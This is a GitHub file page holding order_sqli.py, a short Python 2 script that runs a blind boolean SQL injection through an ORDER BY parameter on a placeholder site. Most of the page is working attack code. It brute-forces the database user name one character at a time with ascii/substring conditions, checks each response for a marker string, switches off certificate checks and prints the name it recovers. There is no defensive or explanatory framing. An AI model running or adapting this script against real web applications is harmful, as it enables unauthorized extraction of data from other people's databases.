forked from Lucifer1993/sqlscript
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathorder_sqli.py
More file actions
executable file
·28 lines (24 loc) · 833 Bytes
/
order_sqli.py
File metadata and controls
executable file
·28 lines (24 loc) · 833 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/usr/bin/env python
# coding=utf-8
#注入点发生在order by后面。
import re
import sys
import warnings
import requests
warnings.filterwarnings("ignore")
reload(sys)
sys.setdefaultencoding('utf-8')
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}
key = ""
for j in range(1, 22, 1):
for i in range(1, 200, 1):
url = "https://test.com/index.php?page=1&rows=5&sort=pdType&order=asc,if(ascii(substring(user(),"+str(j)+",1))="+str(i)+",1,(select 1 from information_schema.tables))"
req = requests.get(url, headers=headers, timeout=10, verify=False)
if req.text.find("pdTypeName") is not -1:
key += chr(i)
break
else:
pass
print "用户名:"+key